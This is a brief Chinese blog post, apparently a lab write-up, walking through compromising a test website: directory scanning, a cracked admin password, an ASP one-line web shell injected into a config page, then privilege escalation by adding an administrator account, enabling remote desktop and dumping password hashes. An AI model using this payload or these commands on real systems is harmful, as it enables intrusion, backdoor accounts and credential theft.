我很简单,不要欺负我

Author Avatar
Geroge Lee 10月 16, 2016
  • 在其它设备中阅读本文章

一次虚拟渗透提权

1、查看环境

2、御剑扫目录

发现/admin目录

3、明小子爆破密码

解密admin/admin888

4、上传一句话

上传木马一句话(点击左侧菜单栏中的 [系统设置管理]–>[网站信息配置],用修改配置文件的方法获取WebShell)

1
2
"%><%Eval Request(Chr(35))%><%'

chr(35)是#的asscill值。如若修改成功,公司名称回显示空白

5、菜刀连接

修改后的公司名称路径为http://www.test.ichunqiu/inc/config.asp

因为我们刚才修改的是网站信息配置页面就是这个路径,当然密码也是可以自己修改的,只要匹配就可以

6、提权

在这个目录下我们上传cmd.exe pe.exe 3389.bat quarkPwDump.exe
是为了提权,拿到管理员的hash

提权工具包括pr,3389,cmd,

路径:C:\Tools\提权工具\windows

C:\tools\hashQuarkPwDump

打开虚拟终端

  1. pr “net user hacker 123 /add”
  2. pr “net localgroup administrators hacker /add”
  3. pr 3389

好了,连接服务器:172.16.12.2/hacker-123

QuarksPwDump –dump-hash-local

hash解密